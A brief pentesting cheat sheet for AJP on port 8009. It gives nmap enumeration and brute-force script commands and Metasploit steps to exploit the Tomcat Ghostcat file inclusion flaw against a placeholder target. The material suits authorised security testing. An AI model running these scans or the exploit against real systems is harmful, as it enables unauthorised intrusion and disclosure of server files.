# AJP (Apache JServ Protocol) Pentesting

AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>
```

### Ghostcat File Inclusion <a href="#ghostcat-file-inclusion" id="ghostcat-file-inclusion"></a>

It's a vulnerability of **Tomcat AJP** ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)).\
Use Metasploit for exploiting it.

```
msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
```